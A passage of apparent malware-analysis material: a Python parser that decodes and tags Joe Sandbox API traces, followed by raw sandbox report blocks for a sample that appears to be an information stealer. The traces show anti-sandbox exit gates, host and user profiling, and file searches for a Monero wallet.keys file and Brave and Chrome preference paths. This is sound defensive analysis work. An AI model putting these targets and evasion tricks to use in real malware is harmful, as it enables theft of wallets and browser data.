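  • Part of subcall function 005E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5228
""",
}

# One report line: optional bullet, optional subcall prefix, API.MODULE, optional
# parenthesised argument list, then "ref: <address>".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: Optional[str] = None


def parse_arg(tok: str):
    """'?' is a value the sandbox could not resolve, 8 hex digits is a DWORD,
    anything else is an inline literal (GET, block, ERROR). The report format
    cannot distinguish an 8-character hex-looking literal from a number."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_trace(text: str):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs" or "Strings"
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), m.group("sub")))
    return calls


# Windows SDK constants for the arguments that matter in these entries.
EVENT_ALL_ACCESS = 0x1F0003
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_OPEN_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x00800000: "INTERNET_FLAG_SECURE",
                   0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                   0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
                   0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


def flags(table):
    """Decoder for a bitmask argument: names of the set bits, or raw hex."""
    return lambda v: "|".join(n for bit, n in table.items() if v & bit) or hex(v)


# (API name, argument index) -> decoder. The GetCurrentProcess entries decode
# the values Joe Sandbox lists against it, which this example reads as the
# arguments already pushed for the VirtualAllocExNuma call that follows
# (assumption about the report layout, see lead-in).
DECODERS = {
    ("OpenEventA", 0): lambda v: "EVENT_ALL_ACCESS" if v == EVENT_ALL_ACCESS else hex(v),
    ("Sleep", 0): lambda v: f"{v} ms",
    ("InternetOpenA", 1): lambda v: INTERNET_OPEN_TYPE.get(v, hex(v)),
    ("InternetConnectA", 5): lambda v: INTERNET_SERVICE.get(v, hex(v)),
    ("InternetSetOptionA", 1): lambda v: INTERNET_OPTION.get(v, hex(v)),
    ("HttpOpenRequestA", 6): flags(HTTP_OPEN_FLAGS),
    ("GetCurrentProcess", 2): flags(MEM_FLAGS),
    ("GetCurrentProcess", 3): lambda v: PAGE_PROT.get(v, hex(v)),
}

# Heuristic tags (this example's assumptions, not Joe Sandbox signatures): each
# rule is an ordered subsequence of API names that must appear in the function.
RULES = {
    "ram_size_gate": ("GlobalMemoryStatusEx", "ExitProcess"),
    "numa_alloc_gate": ("VirtualAllocExNuma", "ExitProcess"),
    "cpu_info_gate": ("GetSystemInfo", "ExitProcess"),
    "single_instance_event": ("OpenEventA", "CreateEventA", "ExitProcess"),
    "wininet_request": ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA"),
}


def is_subsequence(needle, haystack):
    it = iter(haystack)
    return all(any(x == n for x in it) for n in needle)


def decode_args(call: Call):
    return {i: DECODERS[(call.api, i)](v) for i, v in enumerate(call.args)
            if (call.api, i) in DECODERS and isinstance(v, int)}


def classify(calls):
    names = [c.api for c in calls]
    return sorted(tag for tag, seq in RULES.items() if is_subsequence(seq, names))


def analyze(entries):
    """Per entry: call order, decoded constant arguments, matched tags."""
    report = {}
    for label, text in entries.items():
        calls = parse_trace(text)
        decoded = {c.api: decode_args(c) for c in calls}
        report[label] = {"calls": [c.api for c in calls],
                         "decoded": {k: v for k, v in decoded.items() if v},
                         "tags": classify(calls)}
    return report


if __name__ == "__main__":
    for label, info in analyze(SAMPLE_ENTRIES).items():
        print(label, info["tags"], info["decoded"])
```

Running it over the four entries reports, among other things, that OpenEventA asks for EVENT_ALL_ACCESS and the retry Sleep is 6000 ms, that the request handle is opened with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE over INTERNET_SERVICE_HTTP after an INTERNET_OPEN_TYPE_DIRECT session, that option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, and that the 0x7D0-byte allocation before the NUMA check is MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE. Pasting the "APIs" block of any other entry into SAMPLE_ENTRIES gives the same treatment; unknown constants are left as hex rather than guessed.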

                        Control-flow Graph

                        Control-flow graph (blocks 5f78e0-5f7972): block 5f78e0-5f7937 calls GetProcessHeap, RtlAllocateHeap and GetComputerNameA, then branches to either 5f7939-5f793e or 5f7942-5f7945; both rejoin at 5f7962-5f7972.
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 77c44ac890269bfc04f07a561f521cd3a41925f5cf675eb4a54b491afbe90bcf
                        • Instruction ID: 5206a68af0426deb1e581ace0478f078ec88d71068519d5e8dcf9f33a7fe29ad
                        • Opcode Fuzzy Hash: 77c44ac890269bfc04f07a561f521cd3a41925f5cf675eb4a54b491afbe90bcf
                        • Instruction Fuzzy Hash: 3F0186B1A4420DEBC714DF94DD45BAABFB8FB04B11F104629FA45E3280C77959008BA1
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005E112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 005E1132
                        • ExitProcess.KERNEL32 ref: 005E1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: d0e10257454c9029c33c7db6d7671a6efa15a4bcae5ad78692cf36b528475271
                        • Instruction ID: 9ec55e9e82c877b183cc7c5f478f68f7b2e68d4dc98c818d761c800400e19896
                        • Opcode Fuzzy Hash: d0e10257454c9029c33c7db6d7671a6efa15a4bcae5ad78692cf36b528475271
                        • Instruction Fuzzy Hash: 33E0E67094534CFFE7286BA19C0EB0D7A78BF04B01F104054F709B65D0D6B52641969D
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005E10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005E10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: ee9233c8fc46ccd175b3b3a086024c79a2848dfdcf7311edc4fc21c91aa4ec29
                        • Instruction ID: fadc9ee828cd8eb57cf842239879d97c916076d7c09d0129a95602be8245c7f3
                        • Opcode Fuzzy Hash: ee9233c8fc46ccd175b3b3a086024c79a2848dfdcf7311edc4fc21c91aa4ec29
                        • Instruction Fuzzy Hash: B2F0E271641218BBEB189BA4AC4DFBABBECF705B15F304448F644E3280D5719F00CAA4
                        APIs
                          • Part of subcall function 005F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                          • Part of subcall function 005F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                          • Part of subcall function 005F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                          • Part of subcall function 005F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                          • Part of subcall function 005F7850: RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                          • Part of subcall function 005F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                        • ExitProcess.KERNEL32 ref: 005E11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 0fcbe2047f251695f35b284895b8f8942ece71bd74ed49b8121494d4963d9c9d
                        • Instruction ID: f24d556a0ccdcb6618b449364c4f3185d0c7976f6f4f6ef44e64370448654ec9
                        • Opcode Fuzzy Hash: 0fcbe2047f251695f35b284895b8f8942ece71bd74ed49b8121494d4963d9c9d
                        • Instruction Fuzzy Hash: 18E0C2B190030E13CE1C33F1AC0EB3A3A8CBF54385F080424FB44C2202FA29E811C56A
                        APIs
                        • VirtualAlloc.KERNEL32(00000000), ref: 00843074
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 838a9c9cd2ca84db14763c639598d3e2137dcade305ce95389c669e180124e02
                        • Instruction ID: 11d076018bd0abc138802a1d6661ad651f50c35a733ac664e3101aa47252ac15
                        • Opcode Fuzzy Hash: 838a9c9cd2ca84db14763c639598d3e2137dcade305ce95389c669e180124e02
                        • Instruction Fuzzy Hash: 06F039B045C70CDFD3007F589C407BEB7A8FB08309F21461DAAC286200EB305A50AA57
                        APIs
                        • wsprintfA.USER32 ref: 005F38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F38E3
                        • lstrcat.KERNEL32(?,?), ref: 005F3935
                        • StrCmpCA.SHLWAPI(?,00600F70), ref: 005F3947
                        • StrCmpCA.SHLWAPI(?,00600F74), ref: 005F395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F3C67
                        • FindClose.KERNEL32(000000FF), ref: 005F3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: a292580e3a203f37d74eb9fad5e12a7f63c725d44ba4e43ffc21f33f9fd81bc5
                        • Instruction ID: b2ab8f1e74a25892af99e2e9a94b2a5c9e8741359008fb927ebfee35a1bbea0e
                        • Opcode Fuzzy Hash: a292580e3a203f37d74eb9fad5e12a7f63c725d44ba4e43ffc21f33f9fd81bc5
                        • Instruction Fuzzy Hash: 7AA130B190020D9BDB34DF64DC89FFA7779BF94300F048598A64D96181EB749B85CF62
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • FindFirstFileA.KERNEL32(00000000,?,00600B32,00600B2B,00000000,?,?,?,006013F4,00600B2A), ref: 005EBEF5
                        • StrCmpCA.SHLWAPI(?,006013F8), ref: 005EBF4D
                        • StrCmpCA.SHLWAPI(?,006013FC), ref: 005EBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005EC7BF
                        • FindClose.KERNEL32(000000FF), ref: 005EC7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: a378b11373a3adf284a10eef2964c286b487d1bc6fc179838942f0ecf9b26a6b
                        • Instruction ID: 8fe718519058bc96eeae15382e05dd87774f39b587c76fc38f91117a433350f2
                        • Opcode Fuzzy Hash: a378b11373a3adf284a10eef2964c286b487d1bc6fc179838942f0ecf9b26a6b
                        • Instruction Fuzzy Hash: C74256B290010997CB18FB70DD5AEFE7B79BFC4300F408558B64A96195EE34AB49CB93
                        APIs
                        • wsprintfA.USER32 ref: 005F492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                        • StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                        • StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                        • FindClose.KERNEL32(000000FF), ref: 005F4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 9c59904ac64220c1ab743c3ca53e8cc2013b89028db33973d077e08abc063410
                        • Instruction ID: 7c7488bfc224560d9f92ddc7f73713fccc4bcbd195e730b8b49f2fa581d3f1a6
                        • Opcode Fuzzy Hash: 9c59904ac64220c1ab743c3ca53e8cc2013b89028db33973d077e08abc063410
                        • Instruction Fuzzy Hash: 576142B1500219ABCB24EBA0DC49EFA777CBF88700F008598A64996141EB74AB45CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005F4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F4587
                        • wsprintfA.USER32 ref: 005F45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F45BD
                        • StrCmpCA.SHLWAPI(?,00600FC4), ref: 005F45EB
                        • StrCmpCA.SHLWAPI(?,00600FC8), ref: 005F4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F468B
                        • FindClose.KERNEL32(000000FF), ref: 005F46A0
                        • lstrcat.KERNEL32(?,0115E838), ref: 005F46C5
                        • lstrcat.KERNEL32(?,0115D880), ref: 005F46D8
                        • lstrlen.KERNEL32(?), ref: 005F46E5
                        • lstrlen.KERNEL32(?), ref: 005F46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 939479ca269bf6dd25e9fbefd0c8a9710d1daf3d1b62ef8c53d8dc17d00410dc
                        • Instruction ID: 69ee46a46f24767edf2c345053cfd4abd0172b46ae4a3214b9c4c87a4f119b18
